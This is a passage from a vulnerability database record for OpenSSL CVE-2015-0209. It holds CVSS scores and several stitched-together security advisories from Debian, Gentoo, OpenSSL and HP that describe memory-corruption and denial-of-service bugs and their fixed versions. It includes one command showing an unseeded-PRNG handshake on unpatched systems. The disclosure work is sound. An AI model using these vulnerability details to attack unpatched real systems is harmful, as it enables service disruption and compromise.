            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2015-0209",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-0209",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-0209",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. OpenSSL is prone to remote memory-corruption vulnerability. \nNote: This issue was previously discussed in BID 73196 (OpenSSL Multiple Unspecified Security Vulnerabilities) but has been given its own record to better document it. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application  using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. This update\nreverts the defective patch applied in that update causing these\nproblems. Additionally a follow-up fix for CVE-2015-0209 is applied. \n\nMultiple vulnerabilities have been discovered in OpenSSL, a Secure\nSockets Layer toolkit. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2015-0286\n\n    Stephen Henson discovered that the ASN1_TYPE_cmp() function\n    can be crashed, resulting in denial of service. \n\nCVE-2015-0287\n\n    Emilia Kaesper discovered a memory corruption in ASN.1 parsing. \n\nCVE-2015-0292\n\n    It was discovered that missing input sanitising in base64 decoding\n    might result in memory corruption. \n\nCVE-2015-0209\n\n    It was discovered that a malformed EC private key might result in\n    memory corruption. \n\nCVE-2015-0288\n\n    It was discovered that missing input sanitising in the\n    X509_to_X509_REQ() function might result in denial of service. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u16. Please review the\nCVE identifiers and the upstream advisory referenced below for details:\n\n* RSA silently downgrades to EXPORT_RSA [Client] (Reclassified)\n  (CVE-2015-0204)\n* Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)\n* ASN.1 structure reuse memory corruption (CVE-2015-0287)\n* X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n* PKCS7 NULL pointer dereferences (CVE-2015-0289)\n* Base64 decode (CVE-2015-0292)\n* DoS via reachable assert in SSLv2 servers (CVE-2015-0293)\n* Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)\n\nThe following issues affect OpenSSL 1.0.2 only which is not part of the\nsupported Gentoo stable tree:\n\n* OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)\n* Multiblock corrupted pointer (CVE-2015-0290)\n* Segmentation fault in DTLSv1_listen (CVE-2015-0207)\n* Segmentation fault for invalid PSS parameters (CVE-2015-0208)\n* Empty CKE with client auth and DHE (CVE-2015-1787)\n* Handshake with unseeded PRNG (CVE-2015-0285)\n\nImpact\n======\n\nA remote attacker can utilize multiple vectors to cause Denial of\nService or Information Disclosure. \nTools such as revdep-rebuild may assist in identifying some of these\npackages. \n\nReferences\n==========\n\n[  1 ] CVE-2015-0204\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0204\n[  2 ] CVE-2015-0207\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0207\n[  3 ] CVE-2015-0208\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0208\n[  4 ] CVE-2015-0209\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0209\n[  5 ] CVE-2015-0285\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0285\n[  6 ] CVE-2015-0287\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0287\n[  7 ] CVE-2015-0288\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0288\n[  8 ] CVE-2015-0289\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0289\n[  9 ] CVE-2015-0290\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0290\n[ 10 ] CVE-2015-0291\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0291\n[ 11 ] CVE-2015-0292\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0292\n[ 12 ] CVE-2015-0293\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0293\n[ 13 ] CVE-2015-1787\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1787\n[ 14 ] OpenSSL Security Advisory [19 Mar 2015]\n       http://openssl.org/news/secadv_20150319.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201503-11\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. OpenSSL Security Advisory [19 Mar 2015]\n=======================================\n\nOpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)\n=====================================================\n\nSeverity: High\n\nIf a client connects to an OpenSSL 1.0.2 server and renegotiates with an\ninvalid signature algorithms extension a NULL pointer dereference will occur. \nThis can be exploited in a DoS attack against the server. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was was reported to OpenSSL on 26th February 2015 by David Ramos\nof Stanford University. The fix was developed by Stephen Henson and Matt\nCaswell of the OpenSSL development team. \n\nReclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)\n============================================================================\n\nSeverity: High\n\nThis security issue was previously announced by the OpenSSL project and\nclassified as \"low\" severity. This severity rating has now been changed to\n\"high\". \n\nThis was classified low because it was originally thought that server RSA\nexport ciphersuite support was rare: a client was only vulnerable to a MITM\nattack against a server which supports an RSA export ciphersuite. Recent\nstudies have shown that RSA export ciphersuites support is far more common. \n\nThis issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. It was previously announced in the OpenSSL\nsecurity advisory on 8th January 2015. \n\nMultiblock corrupted pointer (CVE-2015-0290)\n============================================\n\nSeverity: Moderate\n\nOpenSSL 1.0.2 introduced the \"multiblock\" performance improvement. This feature\nonly applies on 64 bit x86 architecture platforms that support AES NI\ninstructions. A defect in the implementation of \"multiblock\" can cause OpenSSL\u0027s\ninternal write buffer to become incorrectly set to NULL when using non-blocking\nIO. Typically, when the user application is using a socket BIO for writing, this\nwill only result in a failed connection. However if some other BIO is used then\nit is likely that a segmentation fault will be triggered, thus enabling a\npotential DoS attack. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and\nRainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development\nteam. \n\nSegmentation fault in DTLSv1_listen (CVE-2015-0207)\n===================================================\n\nSeverity: Moderate\n\nThe DTLSv1_listen function is intended to be stateless and processes the initial\nClientHello from many peers. It is common for user code to loop over the call to\nDTLSv1_listen until a valid ClientHello is received with an associated cookie. A\ndefect in the implementation of DTLSv1_listen means that state is preserved in\nthe SSL object from one invocation to the next that can lead to a segmentation\nfault. Errors processing the initial ClientHello can trigger this scenario. An\nexample of such an error could be that a DTLS1.0 only client is attempting to\nconnect to a DTLS1.2 only server. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2a. \n\nThis issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSegmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)\n===================================================\n\nSeverity: Moderate\n\nThe function ASN1_TYPE_cmp will crash with an invalid read if an attempt is\nmade to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check\ncertificate signature algorithm consistency this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered and fixed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nSegmentation fault for invalid PSS parameters (CVE-2015-0208)\n=============================================================\n\nSeverity: Moderate\n\nThe signature verification routines will crash with a NULL pointer\ndereference if presented with an ASN.1 signature using the RSA PSS\nalgorithm and invalid parameters. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\n\nThis issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter\nand a fix developed by Stephen Henson of the OpenSSL development team. \n\nASN.1 structure reuse memory corruption (CVE-2015-0287)\n=======================================================\n\nSeverity: Moderate\n\nReusing a structure in ASN.1 parsing may allow an attacker to cause\nmemory corruption via an invalid write. Such reuse is and has been\nstrongly discouraged and is believed to be rare. \n\nApplications that parse structures containing CHOICE or ANY DEFINED BY\ncomponents may be affected. Certificate parsing (d2i_X509 and related\nfunctions) are however not affected. OpenSSL clients and servers are\nnot affected. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Emilia K\u00e4sper and a fix developed by\nStephen Henson of the OpenSSL development team. \n\nPKCS7 NULL pointer dereferences (CVE-2015-0289)\n===============================================\n\nSeverity: Moderate\n\nThe PKCS#7 parsing code does not handle missing outer ContentInfo correctly. \nAn attacker can craft malformed ASN.1-encoded PKCS#7 blobs with\nmissing content and trigger a NULL pointer dereference on parsing. \n\nApplications that verify PKCS#7 signatures, decrypt PKCS#7 data or\notherwise parse PKCS#7 structures from untrusted sources are\naffected. OpenSSL clients and servers are not affected. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was reported to OpenSSL on February 16th 2015 by Michal\nZalewski (Google) and a fix developed by Emilia K\u00e4sper of the OpenSSL\ndevelopment team. \n\nBase64 decode (CVE-2015-0292)\n=============================\n\nSeverity: Moderate\n\nA vulnerability existed in previous versions of OpenSSL related to the\nprocessing of base64 encoded data. Any code path that reads base64 data from an\nuntrusted source could be affected (such as the PEM processing routines). \nMaliciously crafted base 64 data could trigger a segmenation fault or memory\ncorruption. This was addressed in previous versions of OpenSSL but has not been\nincluded in any security advisory until now. \n\nThis issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 0.9.8 users should upgrade to 0.9.8za. \n\nThe fix for this issue can be identified by commits d0666f289a (1.0.1),\n84fe686173 (1.0.0) and 9febee0272 (0.9.8). This issue was originally reported by\nRobert Dugal and subsequently by David Ramos. \n\nDoS via reachable assert in SSLv2 servers (CVE-2015-0293)\n=========================================================\n\nSeverity: Moderate\n\nA malicious client can trigger an OPENSSL_assert (i.e., an abort) in\nservers that both support SSLv2 and enable export cipher suites by sending\na specially crafted SSLv2 CLIENT-MASTER-KEY message. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Sean Burford (Google) and Emilia K\u00e4sper\n(OpenSSL development team) in March 2015 and the fix was developed by\nEmilia K\u00e4sper. \n\nEmpty CKE with client auth and DHE (CVE-2015-1787)\n==================================================\n\nSeverity: Moderate\n\nIf client auth is used then a server can seg fault in the event of a DHE\nciphersuite being selected and a zero length ClientKeyExchange message being\nsent by the client. This could be exploited in a DoS attack. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nHandshake with unseeded PRNG (CVE-2015-0285)\n============================================\n\nSeverity: Low\n\nUnder certain conditions an OpenSSL 1.0.2 client can complete a handshake with\nan unseeded PRNG. The conditions are:\n- The client is on a platform where the PRNG has not been seeded automatically,\nand the user has not seeded manually\n- A protocol specific client method version has been used (i.e. not\nSSL_client_methodv23)\n- A ciphersuite is used that does not require additional random data from the\nPRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA). \n\nIf the handshake succeeds then the client random that has been used will have\nbeen generated from a PRNG with insufficient entropy and therefore the output\nmay be predictable. \n\nFor example using the following command with an unseeded openssl will succeed on\nan unpatched platform:\n\nopenssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA\n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nUse After Free following d2i_ECPrivatekey error (CVE-2015-0209)\n===============================================================\n\nSeverity: Low\n\nA malformed EC private key file consumed via the d2i_ECPrivateKey function could\ncause a use after free condition. This, in turn, could cause a double\nfree in several private key parsing functions (such as d2i_PrivateKey\nor EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption\nfor applications that receive EC private keys from untrusted\nsources. This scenario is considered rare. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by the BoringSSL project and fixed in their commit\n517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nX509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n===================================================\n\nSeverity: Low\n\nThe function X509_to_X509_REQ will crash with a NULL pointer dereference if\nthe certificate key is invalid. This function is rarely used in practice. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Brian Carpenter and a fix developed by Stephen\nHenson of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150319.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2010-5107    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2013-0248    (AV:L/AC:M/Au:N/C:N/I:P/A:P)        3.3\nCVE-2014-0118    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2014-0226    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2014-0231    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-1692    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2014-3523    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-3569    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-3570    (AV:N/AC:L/Au:N/C:P/I:N/A:N)        5.0\nCVE-2014-3571    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-3572    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2014-8142    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2014-8275    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2014-9427    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2014-9652    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-9653    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2014-9705    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-0204    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2015-0205    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2015-0206    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0207    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0208    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2015-0209    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2015-0231    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-0232    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2015-0273    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-0285    (AV:N/AC:M/Au:N/C:P/I:N/A:N)        4.3\nCVE-2015-0286    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0287    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0288    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0289    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0290    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0291    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0292    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-0293    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-1787    (AV:N/AC:H/Au:N/C:N/I:N/A:P)        2.6\nCVE-2015-1788    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2015-1789    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2015-1790    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-1791    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2015-1792    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-2134    (AV:N/AC:M/Au:S/C:P/I:P/A:P)        6.0\nCVE-2015-2139    (AV:N/AC:M/Au:S/C:P/I:N/A:N)        3.5\nCVE-2015-2140    (AV:N/AC:M/Au:S/C:P/I:P/A:N)        4.9\nCVE-2015-2301    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-2331    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-2348    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2015-2787    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2015-3113    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2015-5122    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2015-5123    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2015-5402    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2015-5403    (AV:N/AC:M/Au:S/C:P/I:N/A:N)        3.5\nCVE-2015-5404    (AV:N/AC:L/Au:N/C:P/I:P/A:N)        6.4\nCVE-2015-5405    (AV:N/AC:M/Au:S/C:P/I:P/A:P)        6.0\nCVE-2015-5427    (AV:N/AC:L/Au:N/C:P/I:P/A:N)        6.4\nCVE-2015-5428    (AV:N/AC:L/Au:N/C:P/I:P/A:N)        6.4\nCVE-2015-5429    (AV:N/AC:L/Au:N/C:P/I:P/A:N)        6.4\nCVE-2015-5430    (AV:N/AC:L/Au:N/C:P/I:N/A:N)        5.0\nCVE-2015-5431    (AV:N/AC:M/Au:S/C:P/I:P/A:N)        4.9\nCVE-2015-5432    (AV:N/AC:L/Au:N/C:P/I:P/A:N)        6.4\nCVE-2015-5433    (AV:N/AC:M/Au:S/C:P/I:N/A:N)        3.5\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nReferences:\n\nCVE-2014-0118 - Remote Denial of Service (DoS)\nCVE-2014-0226 - Remote Denial of Service (DoS)\nCVE-2014-0231 - Remote Denial of Service (DoS)\nCVE-2014-3523 - Remote Denial of Service (DoS)\nCVE-2014-3569 - Remote Denial of Service (DoS)\nCVE-2014-3570 - Remote Disclosure of Information\nCVE-2014-3571 - Remote Denial of Service (DoS)\nCVE-2014-3572 - Remote Disclosure of Information\nCVE-2014-8142 